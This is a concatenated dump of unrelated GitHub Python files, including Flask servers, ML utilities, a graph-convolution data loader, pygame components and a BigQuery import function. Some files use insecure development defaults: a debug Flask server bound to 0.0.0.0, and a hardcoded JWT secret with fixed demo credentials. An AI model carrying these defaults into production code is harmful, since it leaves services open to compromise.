'WMSAdministrator' in self.apis:\n# self.wmsAdmin = self.apis[ 'WMSAdministrator' ]\n# else: \n# self.wmsAdmin = RPCClient( 'WorkloadManagement/WMSAdministrator' )\n# \n# def doCommand( self ):\n# \"\"\" \n# Returns simple jobs efficiency\n#\n# :attr:`args`: \n# - args[0]: string: should be a ValidElement\n# \n# - args[1]: string should be the name of the ValidElement\n#\n# returns:\n# {\n# 'Result': 'Good'|'Fair'|'Poor'|'Idle'|'Bad'\n# }\n# \"\"\"\n# \n# if not 'siteName' in self.args:\n# return self.returnERROR( S_ERROR( 'siteName is missing' ) )\n# siteName = self.args[ 'siteName' ]\n# \n# # If siteName is None, we take all sites\n# if siteName is None:\n# siteName = CSHelpers.getSites() \n# if not siteName[ 'OK' ]:\n# return self.returnERROR( siteName )\n# siteName = siteName[ 'Value' ]\n# \n# results = self.wmsAdmin.getSiteSummaryWeb( { 'Site' : siteName }, [], 0, 500 )\n#\n# if not results[ 'OK' ]:\n# return self.returnERROR( results )\n# results = results[ 'Value' ]\n# \n# if not 'ParameterNames' in results:\n# return self.returnERROR( S_ERROR( 'Malformed result dictionary' ) )\n# params = results[ 'ParameterNames' ]\n# \n# if not 'Records' in results:\n# return self.returnERROR( S_ERROR( 'Malformed result dictionary' ) )\n# records = results[ 'Records' ]\n# \n# jobResults = [] \n# \n# for record in records:\n# \n# jobDict = dict( zip( params , record ))\n# try:\n# jobDict[ 'Efficiency' ] = float( jobDict[ 'Efficiency' ] )\n# except KeyError, e:\n# return self.returnERROR( S_ERROR( e ) )\n# except ValueError, e:\n# return self.returnERROR( S_ERROR( e ) ) \n# \n# jobResults.append( jobDict )\n# \n# return S_OK( jobResults ) \n\n################################################################################\n\n", "repo_name": "coberger/DIRAC", "sub_path": "ResourceStatusSystem/Command/JobCommand.py", "file_name": "JobCommand.py", "file_ext": "py", "file_size_in_byte": 9975, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "DIRAC.ResourceStatusSystem.Command.Command.Command", "line_number": 18, "usage_type": "name"}, {"api_name": "DIRAC.WorkloadManagementSystem.DB.JobDB.JobDB", "line_number": 30, "usage_type": "call"}, {"api_name": "DIRAC.ResourceStatusSystem.Client.ResourceManagementClient.ResourceManagementClient", "line_number": 35, "usage_type": "call"}, {"api_name": "DIRAC.S_OK", "line_number": 54, "usage_type": "call"}, {"api_name": "DIRAC.S_ERROR", "line_number": 64, "usage_type": "call"}, {"api_name": "DIRAC.S_ERROR", "line_number": 68, "usage_type": "call"}, {"api_name": "DIRAC.S_OK", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 98, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 98, "usage_type": "call"}, {"api_name": "DIRAC.S_OK", "line_number": 134, "usage_type": "call"}, {"api_name": "DIRAC.S_OK", "line_number": 150, "usage_type": "call"}, {"api_name": "DIRAC.ResourceStatusSystem.Utilities.CSHelpers.getSites", "line_number": 162, "usage_type": "call"}, {"api_name": "DIRAC.ResourceStatusSystem.Utilities.CSHelpers", "line_number": 162, "usage_type": "name"}, {"api_name": "DIRAC.S_OK", "line_number": 171, "usage_type": "call"}]} +{"seq_id": "41291573827", "text": "from flask import Flask, request, send_from_directory, current_app\nfrom os.path import join\nfrom generator.generator import ZipGen\n\napp = Flask(__name__)\n\n@app.route('/config', methods=[\"POST\"])\ndef server():\n data = request.get_json()\n zipObj = ZipGen()\n zipfile = zipObj.generate(data)\n\n if not zipfile:\n return \"failed\", 500\n else:\n uploads = join(current_app.root_path, app.config['UPLOAD_FOLDER'])\n return send_from_directory(directory=uploads, filename=zipfile), 200\n\nif __name__ == \"__main__\":\n app.config['UPLOAD_FOLDER'] = 'generator/out/generated'\n app.run(host='0.0.0.0', port='5000', debug=True, use_reloader=True)\n\n", "repo_name": "malikakarsh/inSecure", "sub_path": "backend/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 9, "usage_type": "name"}, {"api_name": "generator.generator.ZipGen", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.current_app.root_path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "36373476599", "text": "# Standard Library\nimport argparse\nimport os\n\n# External Libraries\nfrom alembic import command\nfrom alembic.config import Config\n\n# VerdanTech Source\nfrom src import settings\n\n# Find the directory where this script is located\ncurrent_directory = os.path.dirname(os.path.abspath(__file__))\nconfig_directory = os.path.join(current_directory, \"alembic.ini\")\nscript_location = os.path.join(current_directory, \"alembic/\")\n\ndef reset_migrations():\n alembic_cfg = Config(config_directory)\n alembic_cfg.set_main_option(\"sqlalchemy.url\", settings.ALCHEMY_URI)\n alembic_cfg.set_main_option(\"script_location\", script_location)\n\n # Downgrade to the base\n command.downgrade(alembic_cfg, \"base\")\n # Upgrade to the head\n command.upgrade(alembic_cfg, \"head\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Reset database migrations\")\n parser.add_argument(\"--reset\", action='store_true', help=\"Reset all migrations\")\n args = parser.parse_args()\n \n if args.reset:\n reset_migrations()", "repo_name": "nathanielarking/VerdanTech", "sub_path": "src/infra/persistence/sqlalchemy/migrations/reset.py", "file_name": "reset.py", "file_ext": "py", "file_size_in_byte": 1036, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "alembic.config.Config", "line_number": 18, "usage_type": "call"}, {"api_name": "src.settings.ALCHEMY_URI", "line_number": 19, "usage_type": "attribute"}, {"api_name": "src.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "alembic.command.downgrade", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.command", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.command.upgrade", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.command", "line_number": 25, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "42133170010", "text": "import logging\nfrom model import Model\nfrom data_serialize import load_processed_dataset, save_artifact\n\n\ndef run_train():\n model = Model()\n model.train(load_processed_dataset())\n logging.info(\"serialize model\")\n save_artifact(model, \"model.pkl\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)\n\n run_train()\n", "repo_name": "acnaweb/desafio-via", "sub_path": "src/app/models/train_model.py", "file_name": "train_model.py", "file_ext": "py", "file_size_in_byte": 383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "model.Model", "line_number": 7, "usage_type": "call"}, {"api_name": "model.train", "line_number": 8, "usage_type": "call"}, {"api_name": "data_serialize.load_processed_dataset", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 9, "usage_type": "call"}, {"api_name": "data_serialize.save_artifact", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "33790369126", "text": "from scrapeGG import scrapeGG\ninit = scrapeGG('API')\n\nimport json # for testing\n\n# test match api class\nrecent = init.getMatch(1)\n# second = init.getMatch(2)\n# top10 = init.getMatchSequence(10)\n\n# match class tests\n# print(json.dumps(recent.game_player_names(True), indent=2))\n# print(recent.game_player_names(True)) # stable\n\n# print(json.dumps(recent.self_stats(), indent=2))\n# print(recent.self_stats()) # stable\n\n# print(json.dumps(recent.player_stats('API'), indent=2))\n# print(recent.player_stats('API')) # stable\n\n# print(json.dumps(recent.overview(), indent=2))\n# print(recent.overview()) # unstable\n\n# print(json.dumps(recent.build(), indent=2))\n# print(recent.build()) # unstable\n\n\n# profile details class\nprofile = init.getProfile() # stable\n# print(json.dumps(profile.recently_played_with(), indent=2))\n# print(profile.recently_played_with()) # stable\n\n# print(json.dumps(profile.queue_stats('Total'), indent=2))\n# print(profile.queue_stats('Total')) # stable\n\n# print(json.dumps(profile.top_played_champions(), indent=2))\n# print(profile.top_played_champions()) # not really implemented but ok\n\nprint(json.dumps(profile.rank('Ranked Solo'), indent=2))\n# print(profile.rank('Ranked Solo')) # not really implemented but ok\n\ninit.quit()", "repo_name": "emily-yu/scrape.gg", "sub_path": "src/scrape_test.py", "file_name": "scrape_test.py", "file_ext": "py", "file_size_in_byte": 1246, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scrapeGG.scrapeGG", "line_number": 2, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "17163963149", "text": "import pandas as pd\nimport pandas_gbq\nfrom google.cloud import bigquery\n\n\ndef import_xlsx(event, context):\n \"\"\"Triggered by a change to a Cloud Storage bucket. \n Function to access file uploaded to the bucket and transform it into a table in Bq.\n Args:\n event (dict): Event payload.\n context (google.cloud.functions.Context): Metadata for the event.\n \"\"\"\n \n file = event\n nome_bucket = file['bucket']\n nome_objeto = file['name']\n \n # Instanciando cliente do BQ\n client = bigquery.Client()\n\n # Caminho para o objeto do bucket\n caminho_bucket = 'gs://' + nome_bucket + '/' + nome_objeto\n\n # Lendo objeto do bucket e armazenando como dataframe\n df = pd.read_excel(caminho_bucket, index_col=False)\n\n # Replace do . da extensao do arquivo para traco\n nome_tabela_bq = \"raw.\" + nome_objeto.replace('.','-')\n\n # Identificador da tabela no BQ\n identificador_tabela = \"nifty-time-351417.raw\" + nome_tabela_bq\n\n # Se a tabela nao existir cria ela e insere o dataframe na tabela nova\n try:\n client.get_table(identificador_tabela)\n except:\n pandas_gbq.to_gbq(df, nome_tabela_bq)\n", "repo_name": "diegoalvesdev/bot", "sub_path": "src/steps/cloud_functions/import_xlsx/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1164, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "google.cloud.bigquery.Client", "line_number": 19, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 19, "usage_type": "name"}, {"api_name": "pandas.read_excel", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas_gbq.to_gbq", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "33778355408", "text": "import json\nimport mimetypes\nfrom flask import Flask, Response, abort, jsonify, render_template, request, redirect, url_for, flash\nimport pickle\nimport flask\nimport numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import GradientBoostingClassifier\n\nfrom flask_jwt_extended import create_access_token\nfrom flask_jwt_extended import get_jwt_identity\nfrom flask_jwt_extended import jwt_required\nfrom flask_jwt_extended import JWTManager\n\napp = Flask(__name__)\n\napp.config[\"JWT_SECRET_KEY\"] = \"ml_secret_key\" # Change this!\njwt = JWTManager(app)\n\n@app.errorhandler(405)\ndef handle_error(e):\n print(e)\n data = {\n \"Error\": 405,\n \"Msg\": \"Method not allowed\"\n }\n response = Response(\n response=json.dumps(data),\n status=405,\n mimetype='application/json'\n )\n return response\n\ndef bad_request(message):\n response = jsonify({'message': message})\n response.status_code = 400\n return response\n\n\n\n# curl -X POST http://127.0.0.1:5000/login -H \"Content-type: application/json\" -d \"{\\\"username\\\" : \\\"dang\\\", \\\"password\\\" : \\\"vue\\\"}\"\n# Create a route to authenticate your users and return JWTs. The\n# create_access_token() function is used to actually generate the JWT.\n@app.route(\"/login\", methods=[\"POST\"])\ndef login():\n username = request.json.get(\"username\", None)\n password = request.json.get(\"password\", None)\n if username != \"dang\" or password != \"vue\":\n return jsonify({\"msg\": \"Bad username or password\"}), 401\n\n access_token = create_access_token(identity=username)\n return jsonify(access_token=access_token)\n\n\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n\nmodel : GradientBoostingClassifier = pickle.load(open('ml/model.pkl', 'rb'))\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n\n float_features = [float(x) for x in request.form.values()]\n np_features = [np.array(float_features)]\n prediction = model.predict(np_features)\n prediction = prediction[0]\n\n return render_template('index.html', context=f'Predicted Class: {prediction}')\n\n\n\n# ADDING NEW ENDPOINT\n# curl -X POST localhost:5000/api/proba -H \"Content-type: application/json\" -H \"Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY5NjQ0NTMyNywianRpIjoiZGU3MzMyZTUtMzIzOC00YjgyLTlkODUtYTcyYmFiZDE5YTVlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRhbmciLCJuYmYiOjE2OTY0NDUzMjcsImV4cCI6MTY5NjQ0NjIyN30.8in7RuBkmWp0BmCnowtpiN1zAWexNCR673Fzs1E1HDM\" -d \"{\\\"Sepal_Length\\\" : 5.1, \\\"Sepal_Width\\\" : 3.5, \\\"Petal_Length\\\" : 1.4, \\\"Petal_Width\\\" : 0.2}\" \n\n@app.route('/api/proba', methods=['POST'])\n@jwt_required()\ndef proba():\n\n # a = 1\n # if a == 1:\n # return bad_request('message that appears in body')\n \n # Access the identity of the current user with get_jwt_identity\n current_user = get_jwt_identity()\n print(current_user)\n\n data = request.get_json()\n json_data = json.dumps(data)\n # print(json_data)\n dfreadjson = pd.read_json(json_data, orient='index').T\n # print(dfreadjson)\n prediction = model.predict(dfreadjson)\n _proba = model.predict_proba(dfreadjson)[:,1]\n print(prediction)\n\n return jsonify(model.predict_proba(dfreadjson)[:,1].tolist()), 200\n\n\nif __name__ == '__main__':\n app.run(debug=True)", "repo_name": "dangvue0/flask_ml_api", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 15, "usage_type": "call"}, {"api_name": "flask_jwt_extended.JWTManager", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "flask_jwt_extended.create_access_token", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 63, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.form.values", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 68, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 73, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 92, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 101, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "29900451496", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 23 15:46:28 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nimport time\r\n\r\ndef img2txt(img):\r\n serarr=['@','#','$','%','&','?','*','o','/','{','[','(','|','!','^','~','-','_',':',';',',','.','`',' ']\r\n count=len(serarr)\r\n\r\n asd =''#储存字符串\r\n for h in range(img.shape[0]):#h\r\n for w in range(img.shape[1]):#w\r\n gray =img[h,w]\r\n asd=asd+serarr[int(gray/(255/(count-1)))] #灰度越大 越接近白 使用越小的字符例如空字符' '\r\n asd=asd+'\\r\\n'\r\n \r\n print(asd)\r\n return asd\r\n# imwrite() \r\n#####################################\r\n#打开图片\r\nimg = cv2.imread('pg2.jpg',0)\r\nimg=cv2.resize(img,(125,60))\r\n\r\n\r\nasd=img2txt(img)#调用函数\r\n\r\n#保存数据到txt\r\nf = open(\"text.txt\",'w')\r\nf.write(asd)\r\nf.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "labAxiaoming/img2txt", "sub_path": "pg.py", "file_name": "pg.py", "file_ext": "py", "file_size_in_byte": 881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.imread", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "33282028974", "text": "import pygame\nfrom systems import *\n\nclass Component(object):\n def __init__(self, systems):\n # each component has list of system types that must work on component\n # and link to entity to perform component interaction\n self.systems = systems\n self.e = None\n\n\nclass Transform(Component):\n def __init__(self, posx, posy):\n super().__init__([])\n self.x = posx\n self.y = posy\n self.a = 0 # ?\n\n\nclass BasicMovement(Component):\n def __init__(self, speed):\n super().__init__([PhysicsSystem])\n self.speed = speed\n\n\nclass InertiaMovement(Component):\n def __init__(self, friction, power, mass, maxspeed, speed=[0, 0]):\n super().__init__([PhysicsSystem])\n self.friction = friction\n self.mass = mass\n self.power = power\n self.forces = [0, 0] # x, y\n self.speed = speed\n self.maxspeed = maxspeed # ?\n\n\nclass CollisionBox(Component):\n def __init__(self, width, height):\n super().__init__([CollisionSystem])\n self.w = width\n self.h = height\n\n\nclass PlayerCtrl(Component):\n def __init__(self, keyBindsMap):\n super().__init__([HandlerSystem, BotSystem])\n # up; right; down; left\n self.keyBinds = keyBindsMap\n self.direction = [0, 0, 0, 0]\n\n\nclass ChaseBotCtrl(Component):\n def __init__(self):\n super().__init__([BotSystem])\n # up; right; down; left\n self.direction = [0, 0, 0, 0]\n\n\nclass Square(Component):\n def __init__(self, color, size):\n super().__init__([RenderSystem])\n self.color = color\n self.size = size\n self.render_shape = lambda s, x, y: pygame.draw.rect(s, self.color, pygame.Rect(x, y, self.size, self.size))", "repo_name": "Med1v/pygameECSengine", "sub_path": "components.py", "file_name": "components.py", "file_ext": "py", "file_size_in_byte": 1749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.draw.rect", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "43829408598", "text": "import numpy as np\nimport scipy.io\nimport pickle as pkl\nimport networkx as nx\nimport scipy.sparse as sp\nfrom scipy.sparse.linalg.eigen.arpack import eigsh\nimport sys\nfrom itertools import chain\nfrom collections import defaultdict\n\n\ndef parse_index_file(filename):\n \"\"\"Parse index file.\"\"\"\n index = []\n for line in open(filename):\n index.append(int(line.strip()))\n return index\n\n\ndef sample_mask(idx, l):\n \"\"\"Create mask.\"\"\"\n mask = np.zeros(l)\n mask[idx] = 1\n return np.array(mask, dtype=np.bool)\n\ndef sparse_to_tuple(sparse_mx):\n \"\"\"Convert sparse matrix to tuple representation.\"\"\"\n def to_tuple(mx):\n if not sp.isspmatrix_coo(mx):\n mx = mx.tocoo()\n coords = np.vstack((mx.row, mx.col)).transpose()\n values = mx.data\n shape = mx.shape\n return coords, values, shape\n\n if isinstance(sparse_mx, list):\n for i in range(len(sparse_mx)):\n sparse_mx[i] = to_tuple(sparse_mx[i])\n else:\n sparse_mx = to_tuple(sparse_mx)\n\n return sparse_mx\n\n\ndef preprocess_features(features):\n \"\"\"Row-normalize feature matrix and convert to tuple representation\"\"\"\n return sparse_to_tuple(features)\n\n\ndef normalize_adj(adj):\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n\n\ndef preprocess_adj(adj):\n \"\"\"Preprocessing of adjacency matrix for simple GCN model and conversion to tuple representation.\"\"\"\n adj_normalized = normalize_adj(adj + 1 * sp.eye(adj.shape[0]))\n return sparse_to_tuple(adj_normalized)\n\n\ndef construct_feed_dict(features, support,labels, placeholders):\n \"\"\"Construct feed dictionary.\"\"\"\n feed_dict = dict()\n feed_dict.update({placeholders['labels']: labels})\n feed_dict.update({placeholders['features']: features})\n feed_dict.update({placeholders['support'][i]: support[i] for i in range(len(support))})\n feed_dict.update({placeholders['num_features_nonzero']: features[1].shape})\n return feed_dict\n\n\ndef graph_padding(graph_topo_list,graph_tezheng_list,word_pad_length,feature_dimension =3):\n graph_topo_new = []\n graph_tezheng_new = []\n for graph_topo in graph_topo_list:\n len_graph = graph_topo.shape[0]\n to_pad_no = word_pad_length - len_graph\n if to_pad_no <= 0:\n g = graph_topo[range(word_pad_length)][:,range(word_pad_length)]\n graph_topo_new.append(g)\n else:\n graph_topo_tmp = np.zeros(word_pad_length*word_pad_length).reshape(word_pad_length,word_pad_length)\n for i in range(len_graph):\n graph_topo_tmp[i,:len_graph] = graph_topo.todense()[i,:]\n graph_topo_tmp = sp.csr_matrix(graph_topo_tmp,dtype = int)\n graph_topo_new.append(graph_topo_tmp)\n j = 0\n for graph_tezheng in graph_tezheng_list:\n len_graph = graph_tezheng.shape[0]\n to_pad_no = word_pad_length - len_graph\n if to_pad_no <= 0:\n graph_tezheng_new.append(sp.csr_matrix(graph_tezheng[:word_pad_length,:], dtype = int))\n else:\n tezheng_topad = np.array([[0]* feature_dimension for i in range(to_pad_no)])\n try:\n tezheng_topad = sp.csr_matrix(np.vstack((graph_tezheng.todense(),tezheng_topad)), dtype = int)\n except:\n print(j)\n graph_tezheng_new.append(tezheng_topad)\n j += 1\n return graph_topo_new,graph_tezheng_new\n\n\ndef re_order(tuopu_list,feature_list,y_label):\n raw_all_y = y_label\n max_catogory_no = max(sum(y_label),len(y_label) - sum(y_label))\n tag_d = defaultdict(list)\n for x in range(2):\n tag_d[\"string{0}\".format(x)] = []\n \n tag_index = 0\n for tag in raw_all_y:\n tag_d[\"string{0}\".format(tag)].append(tag_index)\n tag_index += 1\n for i in range(2):\n tag_d[\"string{0}\".format(i)] = tag_d[\"string{0}\".format(i)] * int(max_catogory_no/ len(tag_d[\"string{0}\".format(i)]))\n chancha = max_catogory_no - len(tag_d[\"string{0}\".format(i)])\n tag_d[\"string{0}\".format(i)] += tag_d[\"string{0}\".format(i)][:chancha] \n index_result = [None]*(2 * max_catogory_no)\n for x in range(2):\n index_result[x::2] = tag_d[\"string{0}\".format(x)]\n word_input = list(map(feature_list.__getitem__, index_result))\n tuopu_input = list(map(tuopu_list.__getitem__, index_result))\n y_input = list(map(y_label.__getitem__, index_result))\n return tuopu_input,word_input,y_input\n\n\ndef load_protein_dataset(dataset_name):\n #if dataset_name not in chemical_datasets_list:\n # print_ext('Dataset doesn\\'t exist. Options:', chemical_datasets_list)\n # return\n mat = scipy.io.loadmat('datasets/%s.mat' % dataset_name)\n \n input = mat[dataset_name]\n labels = mat['l' + dataset_name.lower()]\n labels = labels - min(labels)\n \n node_labels = input['nl']\n v_labels = 0\n for i in range(node_labels.shape[1]):\n v_labels = max(v_labels, max(node_labels[0, i]['values'][0, 0])[0])\n \n e_labels = 1\n # For each sample\n samples_V = []\n samples_A = []\n max_no_nodes = 0\n for i in range(input.shape[1]):\n no_nodes = node_labels[0, i]['values'][0, 0].shape[0]\n max_no_nodes = max(max_no_nodes, no_nodes)\n V = np.ones([no_nodes, v_labels])\n for l in range(v_labels):\n V[..., l] = np.equal(node_labels[0, i]['values'][0, 0][..., 0], l+1).astype(np.float32)\n samples_V.append(V)\n A = np.zeros([no_nodes, no_nodes])\n for j in range(no_nodes):\n for k in range(input[0, i]['al'][j, 0].shape[1]):\n A[j, input[0, i]['al'][j, 0][0, k]-1] = 1\n samples_A.append(A)\n return np.array(samples_V), np.array(samples_A), np.reshape(labels, [-1])\n", "repo_name": "xiyou3368/SAGE", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 5821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 24, "usage_type": "attribute"}, {"api_name": "scipy.sparse.isspmatrix_coo", "line_number": 29, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 55, "usage_type": "call"}, {"api_name": "scipy.sparse.diags", "line_number": 56, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 56, "usage_type": "name"}, {"api_name": "scipy.sparse.eye", "line_number": 62, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 89, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 89, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 96, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 100, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 100, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 100, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 111, "usage_type": "call"}, {"api_name": "scipy.io.io.loadmat", "line_number": 136, "usage_type": "call"}, {"api_name": "scipy.io.io", "line_number": 136, "usage_type": "attribute"}, {"api_name": "scipy.io", "line_number": 136, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 157, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "71391570726", "text": "import os\nimport gzip\nimport numpy as np\nfrom torch.utils import data\n\n\ndef load_mnist(path, kind='train'):\n \"\"\"Load MNIST data from `path`.\"\"\"\n labels_path = os.path.join(path,\n '%s-labels-idx1-ubyte.gz'\n % kind)\n images_path = os.path.join(path,\n '%s-images-idx3-ubyte.gz'\n % kind)\n\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8,\n offset=8)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8,\n offset=16).reshape(len(labels), 784)\n\n return images, labels\n\n\nclass FashionMNISTDataset(data.Dataset):\n def __init__(self, images, labels, transform=None):\n self.images = images\n self.labels = labels\n self.transform = transform\n\n def __len__(self):\n return self.images.shape[0]\n\n def __getitem__(self, idx):\n X = self.images[idx, :].reshape((28, 28, 1))\n\n if self.transform is not None:\n X = self.transform(X)\n\n y = self.labels[idx]\n return X, y\n", "repo_name": "cloudcell/lenet5-pytorch", "sub_path": "data/fashion_mnist.py", "file_name": "fashion_mnist.py", "file_ext": "py", "file_size_in_byte": 1237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", 